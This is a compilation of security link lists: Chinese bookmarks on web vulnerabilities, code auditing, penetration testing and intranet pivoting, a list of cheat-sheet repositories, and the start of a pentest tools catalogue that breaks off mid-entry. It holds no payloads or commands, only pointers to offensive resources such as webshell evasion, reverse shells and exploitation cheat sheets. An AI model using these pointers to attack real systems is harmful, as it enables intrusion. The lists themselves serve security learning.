[在PHP应用程序中利用远程文件包含(RFI)并绕过远程URL包含限制](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html) + [PHP绕过disable_function 总结与实践](https://blog.szfszf.top/tech/php%e7%bb%95%e8%bf%87disable_function-%e6%80%bb%e7%bb%93%e4%b8%8e%e5%ae%9e%e8%b7%b5/) + [PHP源码注解](https://github.com/hoohack/read-php-src) + [通过Antsword看绕过disable_functions](https://www.anquanke.com/post/id/195686) + [PHP 7.0-7.4 disable_functions bypass PoC (`*nix only`)](https://cxsecurity.com/issue/WLB-2020010227) ## Thinkphp + [Thinkphp3.x/5.x系列漏洞总结学习](https://mp.weixin.qq.com/s/Ri1nkSf3w7JoOQ7ZYh1YcA) + [Thinkphp3个版本数据库操作以及底层代码分析](https://xz.aliyun.com/t/6375) ## Python + [python安全和代码审计相关资料收集](https://github.com/bit4woo/python_sec) + [一篇文章带你理解漏洞之 Python 反序列化漏洞](https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8BPython%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/) + [python爬虫教程系列](https://github.com/wistbean/learn_python3_spider) + [BH_US_11_Slaviero_Sour_Pickles_WP.PDF](http://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_WP.pdf) + [Sour Pickles](https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_Slides.pdf) + [Python魔法方法指南](https://pyzh.readthedocs.io/en/latest/python-magic-methods-guide.html) + [python 中遇到的坑,躲坑看这一篇就够了](https://mp.weixin.qq.com/s?__biz=MzAxMTkwODIyNA==&mid=2247494328&idx=2&sn=e52f73ef8cfb07067e5b05898164759c&chksm=9bbb4f57acccc641563bac9dd9d98d5fce8b8a2aee8450dd1c1350dc718837dc40ded3054b2c&mpshare=1&scene=23&srcid&sharer_sharetime=1582038784335&sharer_shareid=a3b3f154db92e8d09cdde92bdb778322%23rd) ### flask + [Flask 的 Context 机制](https://blog.tonyseek.com/post/the-context-mechanism-of-flask/) ## JAVA + [Java快速入门教程:使用IntelliJ IDEA+Maven 创建、开发、管理项目](https://ken.io/note/java-quickstart-idea-maven-console) + [java代码审计文章集合](https://www.cnblogs.com/r00tuser/p/10577571.html) + [浅谈Fastjson RCE漏洞的绕过史](https://www.freebuf.com/vuls/208339.html) + [Java Web安全-代码审计](https://www.freebuf.com/vuls/208339.html) + [浅析Java序列化和反序列化](https://github.com/gyyyy/footprint/blob/master/articles/2019/about-java-serialization-and-deserialization.md) + [java 泛型详解-绝对是对泛型方法讲解最详细的,没有之一](https://blog.csdn.net/s10461/article/details/53941091) ## JS + [深入理解 JavaScript 原型](https://mp.weixin.qq.com/s/qg9LNm3awHBao1Du5n6KMQ) ## 指纹识别技术 + [Web指纹识别技术研究与优化实现](https://mp.weixin.qq.com/s/v92dLQSgLXv7JVkc8AUyvA) ## Burp 插件 + [基于BurpSuite快速探测越权-Authz插件](https://gh0st.cn/archives/2019-06-27/1) ## Fuzz Payload + [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) + [A collection of web attack payloads.](https://github.com/foospidy/payloads) + [Command Injection Payload List](https://github.com/ismailtasdelen/command-injection-payload-list) ## JWT + [JWT (JSON Web Token) (in)security](https://research.securitum.com/jwt-json-web-token-security/) + [攻击JWT的一些方法](https://xz.aliyun.com/t/6776) ## HTTP Request Smuggling + [协议层的攻击——HTTP请求走私](https://paper.seebug.org/1048/) + [一篇文章带你读懂 HTTP Smuggling 攻击](https://xz.aliyun.com/t/6878) ## 协议 + [从一道题深入HTTP协议与HTTP请求走私](https://xz.aliyun.com/t/6631) + [从一道题到协议层攻击之HTTP请求走私](https://xz.aliyun.com/t/6654) + [一文带你了解 HTTP 黑科技](https://segmentfault.com/a/1190000021664229) ## 编码 + [彻底弄懂 Unicode 编码](https://blog.whezh.com/encoded/) ## 其他 + [优秀的开源安全项目](https://github.com/Bypass007/Safety-Project-Collection) + [WIKI|未授权访问的tips](https://mp.weixin.qq.com/s/ki0RwGtMqi8dhsdJ-qq8Kg) + [各漏洞Payload合集](https://github.com/swisskyrepo/PayloadsAllTheThings) + [收集质量好的文章](https://github.com/tom0li/collection-document) + [session,cookie认证会话中的安全问题](https://xz.aliyun.com/t/4265) + [红队后渗透测试中的文件传输技巧](https://paper.seebug.org/834/) + [Pentest-and-Development-Tips](https://github.com/3gstudent/Pentest-and-Development-Tips) + [JSON Web Token (JWT) 攻击技巧](https://xz.aliyun.com/t/2338) + [web安全脑图](https://github.com/SecWiki/sec-chart/tree/master/Web%E5%AE%89%E5%85%A8) + [安全漏洞修复建议汇总](https://attacker.cc/index.php/archives/63/) + [Redis未授权访问在windows下的利用](https://www.anquanke.com/post/id/170360#h3-3) + [redis未授权访问个⼈总结](https://mp.weixin.qq.com/s?__biz=MzUyNTk1NDQ3Ng==&mid=2247484962&idx=1&sn=e0931d70c25bc35218fb26815531cb4b&chksm=fa177ae1cd60f3f78b54b51c9890f9cd2bc90ddfd1f8bd0b97e68269d4d64d845e9d8eb01789&mpshare=1&scene=23&srcid&sharer_sharetime=1579263439295&sharer_shareid=a3b3f154db92e8d09cdde92bdb778322%23rd) + [webshell免杀套路](https://mp.weixin.qq.com/s?srcid=&scene=23&mid=2247483653&sn=e94f77981045eff9cf316f602b1fe305&idx=1&__biz=MzU0NDk1NjAwOQ%253D%253D&chksm=fb750a03cc028315c932a3de51d93be96a305090c44a11184bab7d9a0b22f1441f9ecd17cbee&mpshare=1%23rd) + [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) + [浅谈端口扫描技术](https://xz.aliyun.com/t/5376) + [404 Not Found的知识库](http://4o4notfound.org/index.php/page/4/) + [常见未授权访问漏洞总结](https://xz.aliyun.com/t/6103) + [关于DNS-rebinding的总结](http://www.bendawang.site/2017/05/31/关于DNS-rebinding的总结/) + [Web-Security-Learning](https://chybeta.github.io/2017/08/19/Web-Security-Learning/) + [个人认为对技术提升很不错的书](https://github.com/songhuiqing/book) + [https://github.com/EdOverflow/bugbounty-cheatsheet](https://github.com/EdOverflow/bugbounty-cheatsheet) # 漏洞挖掘 + [初探漏洞挖掘基础](https://xz.aliyun.com/t/5428) + [逻辑漏洞挖掘初步总结篇](https://mp.weixin.qq.com/s/SDmovMd4IhzNmoCLBIzRKA) + [SRC漏洞挖掘经验+技巧篇](https://mp.weixin.qq.com/s?__biz=MzI5MDU1NDk2MA==&mid=2247485949&idx=1&sn=3f08c681660acecc0bbe996619df66ed&chksm=ec1f5cc2db68d5d4782eec77fa36ad329815f0b70ff34c3c0a893e3b107d2c262e8b37e85d2a&mpshare=1&scene=23&srcid=#rd) + [一个基础渗透测试思路](https://mp.weixin.qq.com/s?__biz=MjM5MDkwNjA2Nw==&mid=2650374502&idx=1&sn=f5f0746aea5dca30acff88b5b3bc2bcb&chksm=beb082da89c70bcccd74f7c12138ec839cc835ecf5194133e998918258430fd9b665a4eeb31a&mpshare=1&scene=23&srcid=%23rd) + [API渗透测试基础](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247492079&idx=2&sn=fec50619646b1fd516d31caf06d20ab3&chksm=e91531d5de62b8c3b6fb41f67c2e3ccc95f083d599508791eb32f28620bb5bea7161b7876156&mpshare=1&scene=23&srcid=%23rd) + [实战经验丨业务逻辑漏洞探索之活动类漏洞](https://mp.weixin.qq.com/s?__biz=MzUzNTkyODI0OA==&mid=2247492541&idx=1&sn=aa300be8e78819191915b2051e3ee094&chksm=fafcaf6acd8b267c6591e50a4c1533fa475fa4d8b85315940c1a93b8dfc4f3de3fee1c9d587a&mpshare=1&scene=23&srcid=0320JwfnmLScnLpubL8sp0fX%23rd) + [xss-payload-list](https://github.com/ismailtasdelen/xss-payload-list) + [ios+mac app测试环境搭建](https://xz.aliyun.com/t/4703) + [浅析渗透实战中url跳转漏洞](https://xz.aliyun.com/t/5189) + [京东SRC小课堂系列文章](https://github.com/xiangpasama/JDSRC-Small-Classroom) + [src挖掘奇技淫巧](https://github.com/Wh0ale/SRC-experience) + [细说验证码安全 —— 测试思路大梳理](https://xz.aliyun.com/t/6029) + [漫谈挖洞](https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458298625&idx=1&sn=358a35782f5de4833c563c26f11ef231&chksm=b181998b86f6109d605a6e89d4a7a4e8ce14af7dd3e3b05459f26ec71fb6a25c96d0c9c34d90&mpshare=1&scene=23&srcid&sharer_sharetime=1567271396052&sharer_shareid=a3b3f154db92e8d09cdde92bdb778322%23rd) + [SRC漏洞挖掘实用技巧](https://xz.aliyun.com/t/6155) + [原创干货 | WebFuzzing方法和漏洞案例总结](https://mp.weixin.qq.com/s?__biz=MzU5MzIyNTcxNA==&mid=2247485539&idx=1&sn=178b13f3a814ff415190acead242312c&chksm=fe12fafec96573e8944e5f625c4f3238b0dff8bb32eaee43e4f747299a73dd095415f150e0e3&mpshare=1&scene=23&srcid&sharer_sharetime=1572538235488&sharer_shareid=a3b3f154db92e8d09cdde92bdb778322%23rd) + [结合我的逻辑漏洞实战一些见解](https://xz.aliyun.com/t/6962) + [SRC逻辑漏洞挖掘详解以及思路和技巧](https://mp.weixin.qq.com/s?__biz=MzI5MDU1NDk2MA==&mid=2247488715&idx=1&sn=da788c044e2340cb4573739fa1d2237a&chksm=ec1f41f4db68c8e2dd526dca90aab30747edfa0bab8c038209f6fc1fa377064cf3d25d1bd875&mpshare=1&scene=23&srcid=&sharer_sharetime=1582112217383&sharer_shareid=200d0719c85cccf5545665231781df39#rd) # 渗透测试 + [渗透测试中弹shell的多种方式及bypass](https://xz.aliyun.com/t/5768) + [渗透 Windows 7/2008,兼谈 Windows Server 2003 中文版渗透](https://www.bennythink.com/shadowbroker.html) + [三大渗透框架权限维持](https://mp.weixin.qq.com/s?__biz=MzA3NzE2MjgwMg==&mid=2448904307&idx=1&sn=2bc6e7d98b027ee1ec1d6ea84e559c8f&chksm=8b55c02ebc22493835408d3975801d62631c432bc21a3753fb3b1d5f87847e82f2a7aeccf55c&mpshare=1&scene=23&srcid&sharer_sharetime=1569687897621&sharer_shareid=a3b3f154db92e8d09cdde92bdb778322%23rd) + [端口渗透总结](http://docs.ioin.in/writeup/blog.heysec.org/_archives_577/index.html) + [渗透基础 | 黑客常用端口利用总结](https://mp.weixin.qq.com/s?__biz=MzI5MDU1NDk2MA==&mid=2247487859&idx=1&sn=361924a47da0fd55170c1afc41526c47&chksm=ec1f444cdb68cd5a0ce7e0e6f5c91c0937f10014a46e98e15d26071a7250f33fadc2398d80af&mpshare=1&scene=23&srcid&sharer_sharetime=1573027144353&sharer_shareid=a3b3f154db92e8d09cdde92bdb778322%23rd) + [记一次曲折而又有趣的渗透](https://nosec.org/home/detail/4121.html) # 内网渗透 + [三层网络靶场搭建&MSF内网渗透](https://mp.weixin.qq.com/s?__biz=MzI5MDU1NDk2MA==&mid=2247485799&idx=1&sn=94febf9e32834ce3284aae4c08ab715c&chksm=ec1f5c58db68d54e2cc82295234298e66c8b516a7f4f35be0f3c3bf4bc13ea7b8d995d6f6337&mpshare=1&scene=23&srcid=%23rd) + [【第6周】突破内网渗透中的访问策略限制](https://mp.weixin.qq.com/s?__biz=Mzg3NjA4MTQ1NQ==&mid=2247483765&idx=1&sn=0f26fb89399694873e6ce649ce5cdb42&chksm=cf36f935f841702303e05a257340efb0736e29763a7896045b95716fe4110d13b41548002635&mpshare=1&scene=23&srcid=0301eQAjkxUdrN71FHSxROxP%23rd) + [潜伏+亮剑-大型内网渗透的实战](https://mp.weixin.qq.com/s?__biz=Mzg5MTA3NTg2MA==&mid=2247483837&idx=1&sn=dfdcbeebc39b8c47b72e69a6b5d98020&chksm=cfd3adc6f8a424d0ab1dea447811834802385010a06ed38968cb054c4c13f47892b3d7341096&mpshare=1&scene=23&srcid=%23rd) + [内网渗透tips](https://github.com/Ridter/Intranet_Penetration_Tips#%E5%9F%BA%E4%BA%8E%E4%BC%81%E4%B8%9A%E5%BC%B1%E8%B4%A6%E5%8F%B7%E6%BC%8F%E6%B4%9E) + [3gstudent](https://3gstudent.github.io/) + [域内信息搜集实战](https://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650451733&idx=3&sn=599854cefaee2d8315c2aa098f5cde20&chksm=83bbcaf1b4cc43e7e609926cc054b9275e8fd34005b26526fda59e34707a6b881c17b353202f&mpshare=1&scene=23&srcid=0105H8OKiZClCEu5CPb6W9Do#rd) + [内网安全检查/渗透总结](https://mp.weixin.qq.com/s?__biz=MzU4ODU1MzAyNg==&mid=2247485584&idx=1&sn=d0c68d73c7b993b44fdd485163560f78&chksm=fdda46bdcaadcfab92da586d09a04c35b7ce180c01b5ff07bbfc7c1e09b52a84bf3a0938c771&mpshare=1&scene=23&srcid=0127wWlphn2msh3Yu8ewW9bs#rd) + [内网渗透知识基础及流程](https://www.anquanke.com/post/id/170471) + [从零开始内网渗透学习](https://xz.aliyun.com/t/301) + [Cobalt_Strike_wiki](https://github.com/aleenzz/Cobalt_Strike_wiki) + [内网渗透之端口转发、映射、代理](https://xz.aliyun.com/t/6349) + [meterpreter学习笔记](https://xz.aliyun.com/t/6400) + [windows中常见后门持久化方法总结](windows中常见后门持久化方法总结) + [Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) + [【基础向】实战讲解内网渗透思路](https://xz.aliyun.com/t/6920) + [使用Metasploit进行路由转发](https://www.jianshu.com/p/9eb48aba3fe0) + [内网渗透的常见协议(如kerbeos,ntlm,smb,ldap等)分析](https://daiker.gitbook.io/windows-protocol/) + [Windows 单行命令获取shell](https://mp.weixin.qq.com/s?__biz=MzA4MzMzOTQ4Mw==&mid=2453660764&idx=1&sn=a97e8e5161916c9a3d7f568756ec59c3&chksm=883cb5e8bf4b3cfe19f3a4839aa82566410adba82205608c121bd977da19cd4aad9dcc7862d8&mpshare=1&scene=23&srcid=0216dOyzpyPQNmhpyAWTLBqk&sharer_sharetime=1581788575354&sharer_shareid=a3b3f154db92e8d09cdde92bdb778322%23rd) # 扫描器开发 + [当子域名遇上搜索引擎](https://thief.one/2019/07/01/1/) + [扫描器开发笔记-404页面识别](https://xz.aliyun.com/t/5509) + [漏洞扫描技巧篇[Web 漏洞扫描器]](http://blog.fatezero.org/2019/07/15/web-scanner-trick/) + [网页相似度判断](https://github.com/SPuerBRead/HTMLSimilarity) ## 动态爬虫 + [爬虫 JavaScript 篇[Web 漏洞扫描器]](http://blog.fatezero.org/2018/04/09/web-scanner-crawler-02/) + [NodeJS Headless 动态漏扫爬虫学习记录(爬虫篇)](https://xz.aliyun.com/t/7064) + [漏扫动态爬虫实践](https://www.anquanke.com/post/id/178339) + [为漏扫动态爬虫定制的浏览器](https://github.com/myvyang/chromium_for_spider) + [headless-chrome-crawler](https://github.com/yujiosaka/headless-chrome-crawler) ## XSS + [精细化扫描 XSS 漏洞 – 智能化场景分析](https://mp.weixin.qq.com/s/5s9-ZI5bORc_whTBQF3z0w) + [基于JS语义分析的Dom-XSS自动化研究](https://mp.weixin.qq.com/s?lang=zh_CN&mid=2247483679&sn=8083906ea7c5e0ddb61c52cda987be51&idx=1&token=1003887932&__biz=MzU2NzcwNTY3Mg%253D%253D&chksm=fc986838cbefe12e7e32cad6237695fa45b1a0bc0fd3293bfd8d6cce51bd6680444e940932f2%23rd) # 开发 + [HTTP安全标头及其工作原理(上)](https://mp.weixin.qq.com/s/wUij83cbV7cDuxpu_6EEbg) + [HTTP安全标头及其工作原理(上)](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247491279&idx=4&sn=356c26b916025673bd44057a03edf7ea&chksm=e916cef5de6147e3bbf58d4db87575458f44de995c3eb0293d0f3f721d697a84f7ff751fee6a&mpshare=1&scene=23&srcid=#rd) + [面试 HTTP 都问了啥?](https://mp.weixin.qq.com/s?__biz=MzA3NTUzNjk1OA==&mid=2651562186&idx=1&sn=7cb0a6f1092e58be1e6e48dc8f0da309&chksm=84900f9bb3e7868dd82263ed0dc311028184595a7e44f70ea861590b1db77a8295b413840e11&mpshare=1&scene=23&srcid=%23rd) + [HTTP常见面试题](https://mp.weixin.qq.com/s?__biz=MzA3NTUzNjk1OA==&mid=2651562159&idx=1&sn=50f664e86b3c8b03f4f1ef0e42a648ed&chksm=84900ffeb3e786e81e233daf78fa238fb85ed7745ece76b6da4c42453d3ccdbdef46f6f51af9&mpshare=1&scene=23&srcid=%23rd) + [PHP 最优秀资源的整理汇集](https://github.com/shockerli/php-awesome) + [PHP底层内核源码分析和扩展开发](https://github.com/huqinlou0123/php-internals-extended-development-course) + [深入理解PHP7之zval](https://github.com/laruence/php7-internal/blob/master/zval.md) + [我的从零开始 Web 前端自学之路](https://paper.tuisec.win/detail/7171cff0fc63582) + [优质前端博客](https://github.com/ljianshu/Blog) + [从CGI到FastCGI到PHP-FPM](http://yongxiong.leanote.com/post/%E4%BB%8ECGI%E5%88%B0FastCGI%E5%88%B0PHP-FPM) + [uWSGI、WSGI和uwsgi](https://www.cnblogs.com/wspblog/p/8575101.html) + [PHP7新特性一览](http://oopsguy.com/2016/10/22/php7-new-features/) + [系统的讲解 - PHP 缓存技术](https://mp.weixin.qq.com/s/COGivblI9Gh2xeoXhbyejA) + [技术分享周刊,每周五发布](https://github.com/ruanyf/weekly) + [Linux下gcc生成和使用静态库和动态库详解](http://www.eonew.cn/article_content/4.html) + [前端九部 - 入门者手册2019](https://www.yuque.com/fe9/basic) + [python开发笔记](https://bithack.io/forum/198) + [一些有趣且鲜为人知的 Python 特性](https://github.com/leisurelicht/wtfpython-cn) + [前端入门和进阶学习笔记](https://github.com/qianguyihao/Web) + [Redis 的 8 大应用场景!](https://segmentfault.com/a/1190000016188385) + [《深入理解Node.js:核心思想与源码分析》](https://github.com/yjhjstz/deep-into-node) + [OAuth 2.0 的四种方式](http://www.ruanyifeng.com/blog/2019/04/oauth-grant-types.html) + [深入理解浏览器原理](https://mp.weixin.qq.com/s?__biz=MjM5ODYwMjI2MA==&mid=2649743621&idx=1&sn=069a97a3cf7c3b2402e4b4d3080614ac&chksm=bed3727e89a4fb68f03e5c947aa47a30b128d1a8cb3ad62fb4b53dfdafa2902f8a4eb947c812&mpshare=1&scene=23&srcid&sharer_sharetime=1566067653588&sharer_shareid=a3b3f154db92e8d09cdde92bdb778322%23rd) + [收集免费的接口服务,做一个api的搬运工](https://github.com/fangzesheng/free-api) + [[教程] 大白话 Laravel 中间件](https://juejin.im/post/5cb54cd46fb9a068a03af3dd) + [HTTP2 详解](https://blog.wangriyu.wang/2018/05-HTTP2.html) + [解读HTTP/2与HTTP/3 的新特性(推荐)](https://mp.weixin.qq.com/s?__biz=Mzg5ODA5NTM1Mw==&mid=2247484531&idx=1&sn=a1e07654966fe48eba57306ddc8db7d1&chksm=c06685e5f7110cf3cc310e9fcd6fb54287ccd7285f025141d4f3a425c1d4392b76bd75752db8&mpshare=1&scene=23&srcid&sharer_sharetime=1571190092343&sharer_shareid=a3b3f154db92e8d09cdde92bdb778322%23rd) # 运维 + [Docker中文文档](https://yeasy.gitbooks.io/docker_practice/compose/commands.html) + [系统安全之SSH入侵的检测与响应](https://mp.weixin.qq.com/s/e0FLyOuK1RIQykEiAvAG9g) + [如何保护Linux服务器](https://github.com/imthenachoman/How-To-Secure-A-Linux-Server) + [译 NAT:网络地址转换](https://paper.tuisec.win/detail/6af63a65ccc5e8a) + [Git 命令应急手册](https://zhuanlan.zhihu.com/p/58140227?utm_source=weibo&utm_medium=social&utm_content=snapshot&utm_oi=1062672075189317632) + [【协议森林】技术面试,“三次握手,四次挥手”背后那些事](https://mp.weixin.qq.com/s/rSfR0zCRmYXZIiLU-XgzSA) + [138 条 Vim 命令、操作、快捷键全集](https://mp.weixin.qq.com/s?__biz=MzA3OTgyMDcwNg==&mid=2650636595&idx=1&sn=9710416369e491633e12d7415bb5e5f6&chksm=87a483feb0d30ae86054888b0bbc1a8a39e6b7acaefe43c6e1567ba2af921f275b14f19869a9&mpshare=1&scene=23&srcid=%23rd) + [浅析反向代理](https://mp.weixin.qq.com/s?__biz=MzIxMjEwNTc4NA==&mid=2652988836&idx=1&sn=c6d3a70ad0eda48099894ec0ad31f3c8&chksm=8c9eeaf3bbe963e501c9562fccd5360fd93d4e555756551159c959e8271f9ac2b44c282c5b8c&mpshare=1&scene=23&srcid=%23rd) + [Nginx 学习笔记](https://skyao.gitbooks.io/learning-nginx/) + [Linux中find命令用法全汇总](https://mp.weixin.qq.com/s?__biz=MzA3OTgyMDcwNg==&mid=2650636660&idx=1&sn=aaa3cc94b7e1bf6ec7abbaa286c3246d&chksm=87a483b9b0d30aafa4beed2822e70a4fe4bef70a431e5d53533220a1714b6928fb301dcb25fa&mpshare=1&scene=23&srcid=%23rd) + [一个网络安全基础知识的教程](http://www.buchedan.cn/) + [分布式架构的前世今生](https://paper.tuisec.win/detail/80a9a0901637b50) + [安全运维技巧整理](https://github.com/NB-STAR/Security-Operation) + [mysql用户root多密码成因](https://blog.csdn.net/redwand/article/details/78846538?from=groupmessage&isappinstalled=0) + [mysql的.frm .MYD .MYI .idb .par文件说明](https://blog.csdn.net/happydecai/article/details/82840631) + [应急响应系统之 Linux 主机安全检查](https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247489990&idx=1&sn=db37670d24a97e33b58d30e8f653a909&chksm=ec1e29eedb69a0f8b561d32a08161958f1d340d43046ae8ff63ea4cad51c3494e8f864b30e82&mpshare=1&scene=23&srcid=%23rd) + [增加安全性的 HTTP Headers](https://yu-jack.github.io/2017/10/20/secure-header/) + [MacOS上路由表的操作记录](http://blog.joylau.cn/2018/12/14/MacOS-Route/) + [应急响应实战笔记](https://github.com/Bypass007/Emergency-Response-Notes) + [子网划分及子网掩码计算方法](https://www.cnblogs.com/kangxinxin/p/9917961.html) + [Linux下/proc目录简介](https://blog.spoock.com/2019/10/08/proc/) + [换一种视角理解 awk 命令](https://www.barretlee.com/blog/2019/10/29/awk/) + [深入理解HTTPS工作原理](https://juejin.im/post/5ca6a109e51d4544e27e3048)
docker-cheat-sheet https://github.com/wsargent/docker-cheat-sheet Data-Science--Cheat-Sheet https://github.com/georgearun/Data-Science--Cheat-Sheet Web-Attack-Cheat-Sheet https://github.com/riramar/Web-Attack-Cheat-Sheet machine-learning-cheat-sheet https://github.com/soulmachine/machine-learning-cheat-sheet golang-cheat-sheet https://github.com/a8m/golang-cheat-sheet Android-Cheat-sheet https://github.com/anitaa1990/Android-Cheat-sheet Tech-Interview-Cheat-Sheet https://github.com/tsiege/Tech-Interview-Cheat-Sheet favicon-cheat-sheet https://github.com/audreyfeldroy/favicon-cheat-sheet awesome-pentest-cheat-sheets https://github.com/coreb1t/awesome-pentest-cheat-sheets Java-Deserialization-Cheat-Sheet https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet android-interview-questions https://github.com/MindorksOpenSource/android-interview-questions Active Directory Exploitation Cheat Sheet https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet Default Credentials Cheat Sheet https://github.com/ihebski/DefaultCreds-cheat-sheet vim-cheat-sheet https://github.com/rtorr/vim-cheat-sheet Cobalt Strike CheatSheet https://github.com/S1ckB0y1337/Cobalt-Strike-CheatSheet GraphQL Schema Language Cheat Sheet https://github.com/sogko/graphql-schema-language-cheat-sheet Reverse Shell Cheat Sheet https://github.com/security-cheatsheet/reverse-shell-cheatsheet MobileHackingCheatSheet https://github.com/randorisec/MobileHackingCheatSheet kali-linux-cheatsheet https://github.com/NoorQureshi/kali-linux-cheatsheet Huge-Collection-of-CheatSheet https://github.com/JonnyBanana/Huge-Collection-of-CheatSheet Awesome-CheatSheets https://github.com/wx-chevalier/Awesome-CheatSheets metasploit-cheat-sheet https://github.com/security-cheatsheet/metasploit-cheat-sheet Mobile Application Penetration Testing Cheat Sheet https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet Pentest-Cheat-Sheets https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets bash-shortcuts-cheat-sheet https://github.com/fliptheweb/bash-shortcuts-cheat-sheet Advanced-SQL-Injection-Cheatsheet https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet wireshark-cheatsheet https://github.com/security-cheatsheet/wireshark-cheatsheet OSCP-Cheat-Sheet https://github.com/akenofu/OSCP-Cheat-Sheet Offensive Security / PenTesting Cheatsheets https://github.com/Prodject/Offensive-Security-Cheatsheets WAF/IPS/DLP bypass Cheat Sheet https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet Hacking_Cheat_Sheet https://github.com/ksanchezcld/Hacking_Cheat_Sheet Web-Sec-CheatSheet https://github.com/imran-parray/Web-Sec-CheatSheet Penetration Testing Cheat Sheet https://github.com/ivan-sincek/penetration-testing-cheat-sheet WordPress Plugin Security Testing Cheat Sheet https://github.com/wpscanteam/wpscan/wiki/WordPress-Plugin-Security-Testing-Cheat-Sheet OSCP Buffer Overflow Cheat Sheet https://github.com/V1n1v131r4/OSCP-Buffer-Overflow Bug Bounty Cheat Sheet https://github.com/Neelakandan-A/BugBounty_CheatSheet NodeJS Red Team Cheat Sheet https://github.com/aadityapurani/NodeJS-Red-Team-Cheat-Sheet Bash Cheat Sheet https://github.com/RehanSaeed/Bash-Cheat-Sheet curl HTTP cheat sheet https://github.com/curl/curl-cheat-sheet iOS Cheatsheet https://github.com/Avocarrot/ios-cheatsheet RedTeaming_CheatSheet https://github.com/0xJs/RedTeaming_CheatSheet Awesome-RedTeam-Cheatsheet https://github.com/RistBS/Awesome-RedTeam-Cheatsheet
# Pentest Tools ![](logo.png) The tools listed below are commonly used in penetration testing, and the tool catalog is referenced from Kali Tools, most of which are open source software. The project long-term supplementary update QAQ ## TODO * [x] Directory * [ ] Browser bookmarks * [ ] Tools Usage * [x] Virtual machine - [Windows11 Penetration Suite Toolkit](https://github.com/arch3rPro/Pentest-Windows) ## List * [Information Gathering](#information-gathering) * [Vulnerability Analysis](#vulnerability-analysis) * [Web Applications](#web-applications) * [Database Assessment](#database-assessment) * [Password Attacks](#password-attacks) * [Wireless Attacks](#Wireless-Attacks) * [Reverse Engineering](#Reverse-Engineering) * [Exploitation Tools](#exploitation-tools) * [Sniffing & Spoofing](#Sniffing-&-Spoofing) * [Maintaining Access](#maintaining-access) * [Golang Sec Tools](#Golang-Sec-Tools) * [Reporting Tools](#reporting-tools) * [Social Engineering](#Social-Engineering) * [Code Audit](#code-audit) * [Port Forwarding & Proxies](#port-forwarding--proxies) * [DevSecOps](#DevSecOps) * [RootKit](#RootKit) * [Pentesting Distribution](#Pentesting-Distribution) * [Cyber Range](#Cyber-Range) ### Information Gathering #### Domain Name * [whois](https://docs.microsoft.com/en-us/sysinternals/downloads/whois) - Windows Whois performs the registration record for the domain name or IP address that you specify. ![](svg/Windows.svg) * [DNSrecon-gui](https://github.com/micro-joan/DNSrecon-gui) - DNSrecon tool with GUI for Kali Linux * [Dnsx](https://github.com/projectdiscovery/dnsx) - dnsx is a fast and multi-purpose DNS toolkit allow to run multiple DNS queries of your choice with a list of user-supplied resolvers. #### Subdomain * [subDomainsBrute](https://github.com/lijiejie/subDomainsBrute) - A fast sub domain brute tool for pentesters ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [ksubdomain](https://github.com/boy-hack/ksubdomain) - Subdomain enumeration tool, asynchronous dns packets, use pcap to scan 1600,000 subdomains in 1 second ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Sublist3r](https://github.com/aboul3la/Sublist3r) - Fast subdomains enumeration tool for penetration testers ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [OneForAll](https://github.com/shmilylty/OneForAll) - 👊 OneForAll is a powerful subdomain integration tool ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [LayerDomainFinder](https://github.com/euphrat1ca/LayerDomainFinder) - a subdomains enumeration tool by Layer ![](svg/Windows.svg) * [ct](https://github.com/knownsec/ct) - Collect information tools about the target domain. * [Subfinder](https://github.com/projectdiscovery/subfinder) - Subfinder is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing. * [Probable_subdomains](https://github.com/zzzteph/probable_subdomains) - Subdomains analysis and generation tool. Reveal the hidden! * [domains](https://weakpass.com/generate/domains) - Generate subdomains and wordlists Online. #### Google Hacking * [GHDB](https://www.exploit-db.com/google-hacking-database/) - Google Hack Database ![](svg/chrome.svg) * [SearchDiggity](http://www.bishopfox.com/resources/tools/google-hacking-diggity/attack-tools/) - SearchDiggity 3.1 is the primary attack tool of the Google Hacking Diggity Project ![](svg/Windows.svg) * [Katana](https://github.com/adnane-X-tebbaa/Katana) - A Python Tool For google Hacking ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [GooFuzz](https://github.com/m3n0sd0n4ld/GooFuzz) - GooFuzz is a tool to perform fuzzing with an OSINT approach, managing to enumerate directories, files, subdomains or parameters without leaving evidence on the target's server and by means of advanced Google searches (Google Dorking). ![](svg/linux.svg)![](svg/mac.svg) * [Pagodo](https://github.com/opsdisk/pagodo) - pagodo (Passive Google Dork) - Automate Google Hacking Database scraping and searching . ![](svg/linux.svg)![](svg/mac.svg) * [Google-Dorks](https://github.com/Proviesec/google-dorks) - Useful Google Dorks for WebSecurity and Bug Bounty #### Github * [GitHacker](https://github.com/WangYihang/GitHacker) - 🕷️ A Git source leak exploit tool that restores the entire 